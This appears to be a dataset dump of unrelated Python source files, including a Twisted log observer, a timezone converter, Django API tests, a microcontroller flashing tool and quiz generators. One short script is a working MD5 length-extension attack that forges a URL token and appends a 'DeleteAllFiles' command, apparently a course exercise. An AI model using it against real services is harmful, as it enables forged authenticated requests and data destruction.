text stringlengths 38 1.54M |
|---|
import logging
from twisted.python import log
class LevelFileLogObserver( log.FileLogObserver ):
def __init__( self, file, level = logging.INFO ):
log.FileLogObserver.__init__( self, file )
self.log_level = level
def emit( self, event_dict ):
if event_dict['isError']:
level = logging.ERROR
elif 'level' in event_dict:
level = event_dict['level']
else:
level = logging.INFO
if level >= self.log_level:
event_dict["message"] = ( logging.getLevelName( level ), ) + event_dict["message"]
log.FileLogObserver.emit( self, event_dict )
|
#!/usr/bin/python -tt
# -*- coding: utf-8 -*-
import datetime,pytz,types,calendar,time,locale,sys,json
import xml.etree.cElementTree as ET
from argparse import ArgumentParser
def conv_xml(r,ra,num,fecha,entrada):
elemento=ET.SubElement(r, u"instant")
elemento.attrib={u"date":str(fecha), u"ordinal":str(num)}
def conv_json(num,fecha):
try:
c=fecha.index(',')
fecha=fecha[:c]
fl=fecha.index('\n')
f=fecha[:fl]
print json.dumps({num:f})
except:
try:
fl=fecha.index('\n')
f=fecha[:fl]
print json.dumps({num:f})
except:
fecha=str(fecha)
print json.dumps({num:fecha})
def trocear_mes(fecha):
py=fecha.index('-')
pm=fecha.index('-')
mes=fecha[py+1:pm+3]
mes=int(mes)
#print mes
return mes
def trocear_dia(fecha):
pm=fecha.index('-')
pd=fecha.index('-')+6
pm=pm+4
dia=fecha[pm:pd]
dia=int(dia)
#print dia
return dia
def trocear_hora(fecha):
ph=fecha.index(':')
hora=fecha[ph-2:ph]
hora=int(hora)
#print hora
return hora
def trocear_min(fecha):
pmin=fecha.index(':')
minut=fecha[pmin+1:pmin+3]
minut=int(minut)
#print minut
return minut
def trocear_seg1(fecha):
pmin=fecha.index(':')
seg=fecha[pmin+4:]
seg=int(seg)
#print seg
return seg
def trocear_seg2(fecha):
pmin=fecha.index(':')
pseg=fecha.index(',')
seg=fecha[pmin+4:pseg]
seg=int(seg)
#print seg
return seg
def trocear_ciudad(fecha):
pc=fecha.index(',')
pf=fecha.index('\n')
ciudad=fecha[pc+2:pf]
#print ciudad
return ciudad
def unix(dt):
ut=calendar.timegm(dt.utctimetuple())
return ut
def calcular_zonas(year,mes,dia,hora,minut,seg,ciudad):
utc=pytz.utc
madrid = pytz.timezone("Europe/Madrid")
londres= pytz.timezone("Europe/London")
moscu= pytz.timezone("Europe/Moscow")
tokio= pytz.timezone("Asia/Tokyo")
new_york= pytz.timezone("America/New_York")
zonas=["New_York", "Madrid", "Moscu", "Londres", "Tokio", "UTC"]
for x in zonas:
if ciudad==x:
if x=="Madrid":
dt1=datetime.datetime(year,mes,dia,hora,minut,seg)
dt1=madrid.localize(dt1)
elif x=="New_York":
dt1=datetime.datetime(year,mes,dia,hora,minut,seg)
dt1=new_york.localize(dt1)
elif x=="Londres":
dt1=datetime.datetime(year,mes,dia,hora,minut,seg)
dt1=londres.localize(dt1)
elif x=="Moscu":
dt1=datetime.datetime(year,mes,dia,hora,minut,seg)
dt1=moscu.localize(dt1)
elif x=="Tokio":
dt1=datetime.datetime(year,mes,dia,hora,minut,seg)
dt1=tokio.localize(dt1)
elif x=="UTC":
dt1=datetime.datetime(year,mes,dia,hora,minut,seg)
dt1=utc.localize(dt1)
return dt1
def intro_ciudad(year,mes,dia,hora,minut,seg,x,cz):
utc=pytz.utc
madrid = pytz.timezone("Europe/Madrid")
londres= pytz.timezone("Europe/London")
moscu= pytz.timezone("Europe/Moscow")
tokio= pytz.timezone("Asia/Tokyo")
new_york= pytz.timezone("America/New_York")
if x=="madrid":
tz=cz.astimezone(madrid)
elif x=="new_york":
tz=cz.astimezone(new_york)
elif x=="londres":
tz=cz.astimezone(londres)
elif x=="moscu":
tz=cz.astimezone(moscu)
elif x=="tokio":
tz=cz.astimezone(tokio)
elif x=="utc":
tz=cz.astimezone(utc)
return tz
def main():
parser = ArgumentParser()
parser.add_argument("-t","--timezone",
action="store", dest='timezone',
help="Muestra por la salida estándar el número de línea y la hora dependiendo del formato que se le pase",
default='utc')
parser.add_argument("-j","--json",
action="store_true", dest='json',
help="Muestra la salida en formato json")
parser.add_argument("-a","--ascii",
action="store_true", dest='ascii',
help="Muestra la salida en texto plano")
parser.add_argument("fichero", help="Fichero de fechas", metavar="N")
argumentos=parser.parse_args()
fin=open (argumentos.fichero,'r')
at=argumentos.timezone
zonas_comandos=["new_york", "madrid", "moscu", "londres", "tokio", "UTC"]
fmt="%Y-%m-%d %H:%M:%S %Z%z"
def trocear_year(fecha):
py=fecha.index('-')
if num >=10:
year=fecha[pos-3:py]
else:
year=fecha[pos-2:py]
year=int(year)
return year
root = ET.Element(u"instants")
if argumentos.timezone=='epoch':
root.attrib={u"city":'timestamp'}
else:
root.attrib={u"city":argumentos.timezone}
for linea in fin:
try:
pos=linea.index(" ")+1
num=linea[:pos]
fecha=linea[pos:]
num=int(num)
year=trocear_year(fecha)
mes=trocear_mes(fecha)
dia=trocear_dia(fecha)
hora=trocear_hora(fecha)
minut=trocear_min(fecha)
seg=trocear_seg2(fecha)
ciudad=trocear_ciudad(fecha)
#INTRODUCIMOS EPOCH
if at=='epoch':
dt=calcular_zonas(year,mes,dia,hora,minut,seg,ciudad)
ut=unix(dt)
if argumentos.json==False and argumentos.ascii==False: #salida en formato xml
conv_xml(root, root.attrib,num,ut,'timestamp')
elif argumentos.json==True: #json
conv_json(num,ut)
else:
print num,ut
#INTRODUCIMOS UNA CIUDAD
if len(sys.argv)>2:
for x in zonas_comandos:
if at==x:
dt=calcular_zonas(year,mes,dia,hora,minut,seg,ciudad)
tz=intro_ciudad(year,mes,dia,hora,minut,seg,x,dt)
if argumentos.json==False and argumentos.ascii==False: #formato xml
conv_xml(root,root.attrib,num,tz,x)
elif argumentos.json==True: #json
conv_json(num,tz)
else:
print num,tz
#SIN COMANDOS
if len(sys.argv)<3:
dt=calcular_zonas(year,mes,dia,hora,minut,seg,ciudad)
utc=pytz.utc
tz=dt.astimezone(utc)
print num,tz
except ValueError:
try:
finl=fecha.index('\n')
timst=fecha[:finl]
timst=int(timst)
#INTRODUCIMOS EPOCH
if at=='epoch':
if argumentos.json==False and argumentos.ascii==False: #formato xml
conv_xml(root,root.attrib,num,timst,'timestamp')
elif argumentos.json==True: #json
conv_json(num,timst)
else:
print num,timst
#INTRODUCIMOS UNA CIUDAD
if len(sys.argv)>2:
for x in zonas_comandos:
if at==x:
tiimst=datetime.datetime.utcfromtimestamp(timst)
tiimst=tiimst.strftime(fmt)
year=trocear_year(tiimst)
mes=trocear_mes(tiimst)
dia=trocear_dia(tiimst)
hora=trocear_hora(tiimst)
minut=trocear_min(tiimst)
seg=trocear_seg1(tiimst)
cz=calcular_zonas(year,mes,dia,hora,minut,seg,"UTC")
tz=intro_ciudad(year,mes,dia,hora,minut,seg,x,cz)
if argumentos.json==False and argumentos.ascii==False: #formato xml
conv_xml(root,root.attrib,num,tz,x)
elif argumentos.json==True: #json
conv_json(num,tz)
else:
print num,tz
#SIN COMANDOS
if len(sys.argv)<3:
tiimst=datetime.datetime.utcfromtimestamp(timst)
tiimst=tiimst.strftime(fmt)
year=trocear_year(tiimst)
mes=trocear_mes(tiimst)
dia=trocear_dia(tiimst)
hora=trocear_hora(tiimst)
minut=trocear_min(tiimst)
seg=trocear_seg1(tiimst)
cz=calcular_zonas(year,mes,dia,hora,minut,seg,"UTC")
utc=pytz.utc
tz=cz.astimezone(utc)
print num,tz
except ValueError:
print 'Linea incorrecta'
raise SystemExit
if argumentos.json==False and argumentos.ascii==False and len(sys.argv)!=2 : #formato xml
print ET.tostring(root, encoding="utf-8",method="xml")
fin.close()
if __name__ == "__main__":
main()
|
units_digit = ['','one','two','three','four','five','six','seven','eight','nine']
tens_digit = ['','ten','twenty','thirty','fourty','fifty','sixty','seventy','eighty','ninety']
def reading(number):
unit= (int((str(number))[1]))
tens = (int((str(number))[0]))
return tens_digit[tens] , units_digit[unit]
print(reading(46))
|
from pymd5 import md5, padding
import httplib, urlparse, sys
import urllib
url = sys.argv[1]
parsedUrl = urlparse.urlparse(url)
params = {}
for x in parsedUrl.query.split('&'):
y = x.split('=')
params.update({ y[0] : y[1] })
originalMessageHash = params['token']
m = parsedUrl.query.replace('token=' + params['token'], '')
if m[0] == '&':
m = m[1:]
m_len = len(m) + 8
pad = urllib.quote(padding(m_len * 8))
bits = (m_len + len(padding(m_len*8)))*8
h = md5(state=originalMessageHash.decode('hex'), count=bits)
suffix = '&command3=DeleteAllFiles'
h.update(suffix)
newUrl = '{scheme}://{netloc}{path}?token={token}&{params}{pad}{suffix}'.format(
scheme=parsedUrl.scheme, netloc=parsedUrl.netloc, path=parsedUrl.path,
token=h.hexdigest(), params=m, pad=pad, suffix=suffix)
parsedUrl = urlparse.urlparse(newUrl)
print 'URL:', newUrl
conn = httplib.HTTPSConnection(parsedUrl.hostname)
conn.request('GET', parsedUrl.path + '?' + parsedUrl.query)
print conn.getresponse().read()
|
#!/usr/bin/env python
#
# Copyright (C) 2019 FIBO/KMUTT
# Written by Nasrun (NeverHoliday) Hayeeyama
#
VERSIONNUMBER = 'v1.0'
PROGRAM_DESCRIPTION = "Test detect multiscale"
########################################################
#
# STANDARD IMPORTS
#
import sys
import os
import optparse
########################################################
#
# LOCAL IMPORTS
#
import cv2
import numpy as np
import pickle
import sklearn
import time
########################################################
#
# Standard globals
#
NUM_REQUIRE_ARGUMENT = 2
########################################################
#
# Program specific globals
#
########################################################
#
# Helper functions
#
def loadPickle( picklePathStr ):
with open( picklePathStr, 'r' ) as f:
obj = pickle.load( f )
return obj
########################################################
#
# Class definitions
#
########################################################
#
# Function bodies
#
########################################################
#
# main
#
def main():
# define usage of programing
programUsage = "python %prog arg [option] {} ".format( '[imagePathStr] [modelPath]' ) + str( VERSIONNUMBER ) + ', Copyright (C) 2019 FIBO/KMUTT'
# initial parser instance
parser = optparse.OptionParser( usage = programUsage, description=PROGRAM_DESCRIPTION )
# add option of main script
parser.add_option( "-o", "--myOption", dest = "myOption",
help = "Specify option document here." )
# add option
( options, args ) = parser.parse_args()
# check number of argument from NUM_REQUIRE_ARGUMENT
if len( args ) != NUM_REQUIRE_ARGUMENT:
# raise error from parser
parser.error( "require {} argument(s)".format( NUM_REQUIRE_ARGUMENT ) )
#########################################################
#
# get option and argument
#
# get image path
imagePathStr = args[ 0 ]
modelPathStr = args[ 1 ]
# initial extractor
hog = cv2.HOGDescriptor( ( 40, 40 ), ( 8, 8 ), ( 4, 4 ), ( 4, 4 ), 9 )
# initial model
model = loadPickle( modelPathStr )
# initial image window
cv2.namedWindow( 'img', cv2.WINDOW_NORMAL )
cv2.namedWindow( 'resultImage', cv2.WINDOW_NORMAL )
cv2.namedWindow( 'cropImage', cv2.WINDOW_NORMAL )
# load image and model
img = cv2.imread( imagePathStr )
for i in range( 3 ):
if i == 0:
scaleImage = img.copy()
else:
scaleImage = cv2.pyrDown( scaleImage )
print "image dimension : {}, {}".format( img.shape[ 1 ], img.shape[ 0 ] )
# initial bounding box
boundingBox = ( 40, 40 )
# for visualize
visualizeImage = scaleImage.copy()
# initial bounding list
boundingList = list()
# loop to set lower left
for lly in xrange( 0, scaleImage.shape[ 0 ] - boundingBox[ 1 ], 20 ):
for llx in xrange( 0, scaleImage.shape[ 1 ] - boundingBox[ 0 ], 20 ):
cv2.rectangle( visualizeImage, ( llx, lly ), ( llx + boundingBox[ 0 ], lly + boundingBox[ 1 ] ), ( 255, 0, 0 ), 2 )
cropImage = img[ lly : lly + boundingBox[ 1 ], llx : llx + boundingBox[ 0 ] ].copy()
featureVector = hog.compute( cropImage )
featureVector = featureVector.T
classificationScore = model.predict_proba( featureVector )[ 0, 1 ]
if classificationScore > 0.5:
print "At ( {}, {} ) score : {}".format( llx, lly, classificationScore )
#
# cv2.rectangle( img, ( llx, lly ), ( llx + boundingBox[ 0 ], lly + boundingBox[ 1 ] ), ( 0, 0, 255 ), 2 )
cv2.imshow( 'img', visualizeImage )
cv2.imshow( 'resultImage', img )
cv2.imshow( 'cropImage', cropImage )
cv2.waitKey( 1 )
time.sleep( 0.015 )
visualizeImage = scaleImage.copy()
cv2.imshow( 'img', visualizeImage )
cv2.imshow( 'resultImage', img )
cv2.imshow( 'cropImage', cropImage )
cv2.waitKey( 0 )
cv2.destroyAllWindows()
########################################################
#
# call main
#
if __name__=='__main__':
main()
|
from filter import ImageHolder
import multiprocessing
import os
IMAGE_DIR = "images"
if __name__ == "__main__":
print("Virtual cores:", multiprocessing.cpu_count())
ImH = ImageHolder()
processes = []
for i, filename in enumerate(os.listdir(IMAGE_DIR)):
processes += [multiprocessing.Process(target=ImH.apply_filters, args=(IMAGE_DIR + '/' + filename,))]
processes_run = []
stack = []
for proc in processes:
proc.start()
|
# "venkatesh"
# "vhesnekta"
s="venkat"
s1=""
l=len(s)-1
if len(s1)<len(s):
for i in range(len(s)):
s1=s1+s[i]
for j in range(l,l-1,-1):
p=l-j
s1=s1+s[p]
l=l-1
print(s1)
|
from .file_utilities import *
from .math_utilities import *
from .plot_utilities import *
from .data_utilities import *
|
# Generated by Django 2.0.5 on 2018-07-07 18:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server_alpha_app', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='usermodel',
name='name',
),
migrations.AlterField(
model_name='debtmodel',
name='amount',
field=models.DecimalField(decimal_places=2, max_digits=5),
),
migrations.AddIndex(
model_name='customermodel',
index=models.Index(fields=['cpf'], name='cpf_idx'),
),
migrations.AddIndex(
model_name='debtmodel',
index=models.Index(fields=['customer'], name='customer_idx'),
),
migrations.AddIndex(
model_name='usermodel',
index=models.Index(fields=['username'], name='username_idx'),
),
]
|
# find the last element of a list
# use python's built in list indexing with a special case for an empty list
# note: I believe cpython keeps track of a list's length for quick lookup so
# len() does not require a traversal, only field lookup, but I should
# find where that's spelled out or write a test to prove it...
def last(l):
if len(l) == 0:
return None
return l[-1]
from hypothesis import given
import hypothesis.strategies as st
def test_last():
l = [1, 2, 3]
assert last(l) == 3
l = [1, 'a', 'b']
assert last(l) == 'b'
l = []
assert last(l) == None
@given(st.lists(elements=st.integers()))
def test_hyp(l):
result = last(l)
if len(l) == 0:
assert result is None
else:
assert result == l[-1]
|
######################
### Custom Imports ###
######################
from . import commands
from . import settings
######################
def start(): # The Start up of game
print("""
*--------------------------------*
Welcome to Space Exploration Game
coded in Py3.7
By: DrProfMaui
*--------------------------------*
""")
settings.setname()
settings.setshipname()
commands.command() |
"""Tile."""
class Tile:
"""Tile."""
def __init__(self, sprite, solid=False, high=False, mask=None, slow=False):
"""Constructor."""
self.sprite = sprite
self.mask = mask
self.solid = solid
self.high = high
self.slow = slow
self.type = type
self.is_building = None
self.mobs = []
self.projectiles = []
self.building = None
|
'''
Write a python program that it should consist of special char, numbers and chars .
if there are even numbers of special chars
Then 1) the series should start with even followed by odd
Input: t9@a42&516
Output: 492561
If there are odd numbers of special chars then the output will be starting with odd followed by even
Input:5u6@25g7#@
Output:56527
If there are any number of additional digits append them at last
'''
import re
l=[]
st='t9@a42&516'
n=list(map(int,re.findall('[0-9]',st)))
e=list(filter(lambda x: x%2==0,n))
o=list(filter(lambda x: x%2!=0,n))
if len(re.sub('[\w]','',st))%2==0:
for i in list(zip(e,o)):
l.extend(list(i))
else:
for i in list(zip(o,e)):
l.extend(list(i))
print(''.join(map(str,l))) |
from django.test import TestCase
from api.models import (
Company,
DeviceModel,
Device,
)
from rest_framework.test import APIClient
from rest_framework import status
from django.urls import reverse
class CompanyViewTestCase(TestCase):
"""Test suite for the api views."""
def setUp(self):
"""Define the test client and other test variables."""
self.client = APIClient()
self.company_data = {'name': 'Apple'}
self.response = self.client.post(
reverse('create_company'),
self.company_data,
format="json")
def test_api_can_create_a_company(self):
"""Test the api has company creation capability."""
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
def test_api_can_read_a_company(self):
"""Test the api has company creation capability."""
company = Company.objects.get()
response = self.client.get(
reverse('details',
kwargs={'pk': company.id}), format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertContains(response, company)
def test_api_can_update_company(self):
"""Test the api can update a given company."""
company = Company.objects.get()
change_company = {'name': 'Something new'}
res = self.client.put(
reverse('details', kwargs={'pk': company.id}),
change_company, format='json'
)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_api_cannot_update_when_not_company(self):
"""Test the api cannnot update a given company."""
change_company = {'name': 'Something new'}
res = self.client.put(
reverse('details', kwargs={'pk': 9999}),
change_company, format='json'
)
self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
def test_api_can_delete_company(self):
"""Test the api can delete a company."""
company = Company.objects.get()
response = self.client.delete(
reverse('details', kwargs={'pk': company.id}),
format='json',
follow=True)
self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)
class DeviceModelViewTestCase(TestCase):
"""Test suite for the device movel api views."""
def create_company(self, name="Apple"):
return Company.objects.create(name=name)
def setUp(self):
"""Define the test client and other test variables."""
self.client = APIClient()
self.device_model_data = {
'name' : 'iPhone 3GS',
'release_year': 2010,
'device_type' : DeviceModel.TYPE_SMARTPHONE,
'company_id' : self.create_company().id
}
self.response = self.client.post(
reverse('create_device_model'),
self.device_model_data,
format="json")
def test_api_can_create_a_device_model(self):
"""Test the api has device model creation capability."""
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
class DeviceViewTestCase(TestCase):
"""Test suite for the device api views."""
def create_company(self, name="Apple"):
return Company.objects.create(name=name)
def create_device_model(self, name="iPhone 3GS", release_year=2000, company=None):
company = self.create_company()
return DeviceModel.objects.create(name=name, release_year=release_year, company=company)
def setUp(self):
"""Define the test client and other test variables."""
self.client = APIClient()
self.device_data = {
'device_model_id' : self.create_device_model().id,
'capacity' : 32,
'color' : 'White',
'os_version' : 'iOS 7'
}
self.response = self.client.post(
reverse('create_device'),
self.device_data,
format="json")
def test_api_can_create_a_device(self):
"""Test the api has device creation capability."""
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
def test_api_can_read_a_device(self):
"""Test the api has device read capability."""
device = Device.objects.get()
response = self.client.get(
reverse('device_details',
kwargs={'pk': device.id}), format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_api_can_update_device(self):
"""Test the api can update a given device."""
device = Device.objects.get()
change_device = self.device_data
change_device['capacity'] = 64
res = self.client.put(
reverse('device_details', kwargs={'pk': device.id}),
change_device, format='json'
)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_api_can_delete_a_device(self):
"""Test the api can delete a device."""
device = Device.objects.get()
response = self.client.delete(
reverse('device_details', kwargs={'pk': device.id}),
format='json',
follow=True)
self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)
|
#!/usr/bin/env python3
from __future__ import print_function
import errno
import sys
import logging
from pyocd.core.helpers import ConnectHelper
from pyocd.flash.file_programmer import FileProgrammer
from pyocd.flash.eraser import FlashEraser
from binho.utils import log_silent, log_verbose
from binho.errors import DeviceNotFoundError
from binho.utils import binhoArgumentParser
def main():
# Set up a simple argument parser.
parser = binhoArgumentParser(
description="utility for using supported Binho host adapters in DAPLink mode to flash code to MCUs"
)
parser.add_argument("-t", "--target", default=None, help="Manufacturer part number of target device")
parser.add_argument("-f", "--file", default=None, help="Path to binary file to program")
parser.add_argument(
"-e", "--erase", action="store_true", help="Perform chip-erase before programming",
)
parser.add_argument(
"-r", "--reset", action="store_true", help="Reset the device after programming completes",
)
args = parser.parse_args()
log_function = log_verbose if args.verbose else log_silent
log_function("Checking for pyOCD...")
try:
import pyocd # pylint: disable=import-outside-toplevel
except ModuleNotFoundError:
print("PyOCD must be installed for this to work. Use 'pip install pyocd' to install the module.")
sys.exit(1)
log_function("pyOCD installation confirmed!")
try:
log_function("Trying to find a Binho host adapter...")
device = parser.find_specified_device()
if device.inDAPLinkMode:
log_function(
"{} found on {} in DAPLink mode (Device ID: {})".format(
device.productName, device.commPort, device.deviceID
)
)
else:
log_function("{} found on {}. (Device ID: {})".format(device.productName, device.commPort, device.deviceID))
print("The {} is not in DAPLink mode. Please use the 'binho daplink' command ")
sys.exit(errno.ENODEV)
except DeviceNotFoundError:
if args.serial:
print(
"No Binho host adapter found matching Device ID '{}'.".format(args.serial), file=sys.stderr,
)
else:
print("No Binho host adapter found!", file=sys.stderr)
sys.exit(errno.ENODEV)
# if we fail before here, no connection to the device was opened yet.
# however, if we fail after this point, we need to make sure we don't
# leave the serial port open.
try:
if not args.file and not (args.erase or args.reset):
print("No binary file to program was supplied.")
sys.exit(1)
erase_setting = "auto"
target_override = "cortex_m"
if args.erase:
erase_setting = "chip"
if args.target:
target_override = args.target
if args.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.WARNING)
with ConnectHelper.session_with_chosen_probe(
target_override=target_override, chip_erase=erase_setting, smart_flash="false",
) as session:
board = session.board
target = board.target
print("Vendor: {}\tPart Number: {}".format(target.vendor, target.part_number))
if args.erase:
eraser = FlashEraser(session, FlashEraser.Mode.CHIP)
eraser.erase()
print("{} erased".format(target.part_number))
if args.file:
FileProgrammer(session).program(args.file)
log_function("Target {} programmed with {}".format(target.part_number, args.file))
if args.reset:
target.reset()
print("Target {} reset".format(target.part_number))
except pyocd.core.exceptions.TransferError:
print(
"Problem communicating with the target MCU. Please make sure SWDIO, SWCLK, and GND are properly "
" connected and the MCU is powered up."
)
finally:
# close the connection to the host adapter
device.close()
if __name__ == "__main__":
main()
|
import sys
#sys.path.append(
# '/home/jbs/develop.old/articles/201509_python_exercises_generator')
#sys.path.append('/home/jbs/develop/201902_questions_transformer')
sys.path.append('../qom_questions_transformer')
import string
from random import sample
from random import choice
from random import randint
from random import shuffle
from string import ascii_letters
from text_transformer.tt_text_transformer_interface import add_changeable
#from text_transformer.tt_text_transformer_interface import change_all_occurrences
from text_transformer.tt_text_transformer_interface import change_one_occurrence
# # this import removes an import error. I don't know why (jbs
# # 2018/12/12). see pt_import_tests.py and try to correct the problem.
# import py_transformer.ast_processor
# from python_transformer.pt_python_transformer_interface import change_identifier_all_occurrences
# from python_transformer.pt_python_transformer_interface import change_all_occurrences_in_strings
from python_transformer.pt_python_transformer_interface import change_token_all_occurrences
from python_transformer.pt_python_transformer_interface import change_all_occurrences
#from sympy import latex, sympify
# in the question (program)
add_changeable('135') # seed
add_changeable('a') # the list
add_changeable('n') # the loop variable
add_changeable('x') # the loop variable
add_changeable('d') # the dictionary variable
add_changeable('dic') # the dictionary class variable
add_changeable('str_a') # the list of strings
add_changeable('int_a') # the list of ints
add_changeable('13') # the list length
add_changeable('3') # the min int value
add_changeable('33') # the max int value
# answers list name
add_changeable(r'\verb+a+')
# answers object dictionary class name
add_changeable(r'\verb+dic+')
# answers object dictionary class val
add_changeable(r'\verb+dic_val+')
# answer new val to add to object dectionary class
add_changeable(r'\verb+add_val+')
# answers dictionary name
add_changeable(r'\verb+d+')
# answers (indexes)
add_changeable(r'\verb+1+')
add_changeable(r'\verb+2+')
add_changeable(r'\verb+3+')
add_changeable(r'\verb+4+')
add_changeable(r'\verb+4_t+')
add_changeable(r'\verb+4_f+')
add_changeable(r'\verb+5+')
# right answers values
add_changeable(r'\verb+11_1+')
add_changeable(r'\verb+11_2+')
add_changeable(r'\verb+22+')
add_changeable(r'\verb+33+')
add_changeable(r'\verb+44+')
add_changeable(r'\verb+55+')
# wrong answers values
add_changeable(r'\verb+111_1+')
add_changeable(r'\verb+111_2+')
add_changeable(r'\verb+222+')
add_changeable(r'\verb+333+')
add_changeable(r'\verb+444+')
add_changeable(r'\verb+555+')
# variáveis partilhas entre as funções make_transformations e
# make_transformations_on_results
a = None
d = None
str_a = None
int_a = None
dic = None
_2 = None
_3 = None
_3_idx = None
_3_decision = None
_4 = None
_4_decision = None
_5 = None
pt_u = "ú".encode('utf8').decode('iso-8859-1')
pt_numeros = 'n' + pt_u + 'meros'
def make_transformations():
''
global a
global d
global str_a
global int_a
global dic
global _2
global _3_decision
global _4
global _4_decision
global _5
# question
_135 = str(randint(1000000, 2000000))
[a, n, x, d, dic] = sample(string.ascii_lowercase, 5)
_13 = randint(19000, 20000)
_3 = randint(0, 5)
_33 = randint(_3, 500)
str_a = 'str_' + a
int_a = 'int_' + a
change_all_occurrences('135', _135)
change_token_all_occurrences('a', a)
change_token_all_occurrences('n', n)
change_token_all_occurrences('x', x)
change_token_all_occurrences('d', d)
change_token_all_occurrences('dic', dic)
change_token_all_occurrences('str_a', str_a)
change_token_all_occurrences('int_a', int_a)
change_all_occurrences('13', str(_13))
change_all_occurrences('3', str(_3))
change_all_occurrences('33', str(_33))
# answers
change_all_occurrences(r'\verb+a+', r'\verb+' + a + '+')
change_all_occurrences(r'\verb+d+', r'\verb+' + d + '+')
change_all_occurrences(r'\verb+dic+', r'\verb+' + dic + '+')
# indexes with no repetitions
_2 = choice((d, str_a, int_a, a))
_3_decision = choice(("int", "float", "str"))
_4 = choice(ascii_letters)
_5 = choice(("maior", "menor"))
change_all_occurrences(r'\verb+2+', r'\verb+' + _2 + '+')
change_all_occurrences(r'\verb+4+', r'\verb+' + _4 + '+')
change_all_occurrences(r'\verb+4_t+', r'\verb+"' + _4 + '"+')
_4_decision = choice((0, 1))
if _4_decision == 0:
change_all_occurrences(r'\verb+4_f+', r'\verb+"' + _4 + '"+')
else:
change_all_occurrences(r'\verb+4_f+', r'\verb+' + _4 + '+')
change_all_occurrences(r'\verb+5+', r'\verb+' + _5 + '+')
def make_transformations_on_results(program):
''
# os global aqui não são precisos porque não se faz nesta função
# atribuição a estas variáveis. Só está para para tornar explícito
# que são variáveis globais partilhadas
global a
global d
global str_a
global int_a
global dic
global _2
global _3
global _3_idx
global _3_decision
global _4
global _4_decision
global _5
the_list = program.get_global(a)
str_the_list = program.get_global(str_a)
int_the_list = program.get_global(int_a)
the_dic = program.get_global(dic)
the_dict = program.get_global(d)
_3_idx = choice(ascii_letters)
_3 = the_dic[_3_idx][0] if _3_decision == 'int' else the_dic[_3_idx] * 1.0 \
if _3_decision == 'float' else _3_idx
# answer index
change_all_occurrences(r'\verb+3+', r'\verb+' + str(_3) + '+')
# answer values
dic_val = the_dic[_4][0]
change_all_occurrences(r'\verb+dic_val+', r'\verb+' + str(dic_val) + '+')
add_val = randint(7, 500)
change_all_occurrences(r'\verb+add_val+', r'\verb+' + str(add_val) + '+')
answer_1_1_true = "letras" if len(str_the_list) > len(int_the_list) else pt_numeros
answer_1_2_true = pt_numeros if answer_1_1_true == "letras" else "letras"
answer_2_true = "tamanho maior" if len(d) > len(_2) else "tamanho menor" \
if len(d) < len(_2) else "tamanho igual"
answer_3_true = the_dic[_3][0]
answer_4_true = 'o valor ' + str(add_val)
answer_5_true = get_max_key(the_dict) if _5 == "maior" else get_min_key(the_dict)
# true answers
change_all_occurrences(r'\verb+11_1+', str(answer_1_1_true))
change_all_occurrences(r'\verb+11_2+', str(answer_1_2_true))
change_all_occurrences(r'\verb+22+', str(answer_2_true))
change_all_occurrences(r'\verb+33+', str(answer_3_true))
change_all_occurrences(r'\verb+44+', str(answer_4_true))
change_all_occurrences(r'\verb+55+', str(answer_5_true))
# wrong answers
increment4 = choice([1, -1])
increment5 = choice([1, -1])
answer_1_1_false = pt_numeros if answer_1_1_true == "letras" else "letras"
answer_1_2_false = "letras" if answer_1_1_true == "letras" else pt_numeros
answer_2_false = choice(("tamanho maior", "tamanho menor")) \
if answer_2_true == "tamanho igual" else \
"tamanho maior" if answer_2_true == "tamanho menor" \
else "tamanho menor"
answer_3_false = quest_3_false(answer_3_true)
answer_4_false = 'os valores ' + str(add_val) + ' e ' + str(dic_val) \
if _4_decision == 0 else 'o valor ' + str(add_val)
answer_5_false = get_min_key(the_dict) if _5 == "maior" else get_max_key(the_dict)
change_all_occurrences(r'\verb+111_1+', str(answer_1_1_false))
change_all_occurrences(r'\verb+111_2+', str(answer_1_2_false))
change_all_occurrences(r'\verb+222+', str(answer_2_false))
change_all_occurrences(r'\verb+333+', str(answer_3_false))
change_all_occurrences(r'\verb+444+', str(answer_4_false))
change_all_occurrences(r'\verb+555+', str(answer_5_false))
def quest_3_false(true_answer):
false_answer = None
if true_answer == "None":
return _3_idx
if isinstance(true_answer, int):
return true_answer - 1 if true_answer > 0 else true_answer + 1
while True:
false_answer = choice(ascii_letters)
if false_answer != true_answer:
break
return false_answer
def get_max_key(d):
return max(d, key=d.get)
def get_min_key(d):
return min(d, key=d.get)
|
import os, struct, sys
def make_file_index(fname, idx_fname) :
# open the original file normally, and the index file as a
# binary file
with open(fname,'r') as f_in, open(idx_fname,'wb') as f_out :
# doing a normal iteration over the file lines
# as in 'for line in f_in' will not work combined with
# f_in.tell(). Therefore, we need to use this other way
# of iterating over the file.
# From https://stackoverflow.com/a/14145118/2312821
lineno = 0
for line in iter(f_in.readline, '') :
f_out.write('%s'%(struct.pack("Q", f_in.tell())))
lineno += 1
f_out.seek(-8, os.SEEK_CUR)
f_out.write('%s'%(struct.pack("Q", lineno)))
# check for proper invocation
if len(sys.argv) < 3 :
print "Usage: make_pbd_idx <pbd_fname> <idx_fname>"
sys.exit(1)
# file names
pbd_fname = sys.argv[1]
idx_fname = sys.argv[2]
# now invoke the file indexing method
make_file_index(pbd_fname, idx_fname)
|
from argparse import ArgumentParser
from pymad import loadTrack, synthesize
from pymad.piano import loadDrum
if __name__ == "__main__":
parser = ArgumentParser("drum", description="synthesis drum track")
parser.add_argument("track", help="track path")
parser.add_argument("output", help="output wav path")
parser.add_argument("-o", "--orchestra", action="append", nargs=2, metavar=("id", "path"), help="add an orchestra")
parser.add_argument("-v", "--volume", type=float, default=0, help="volume offset in dB")
parser.add_argument("-s", "--speed", type=float, default=1, help="speed ratio")
parser.add_argument("-q", "--quiet", action="store_true", help="suppress log output")
args = parser.parse_args()
drums = {}
for o in args.orchestra:
drums[int(o[0])] = o[1]
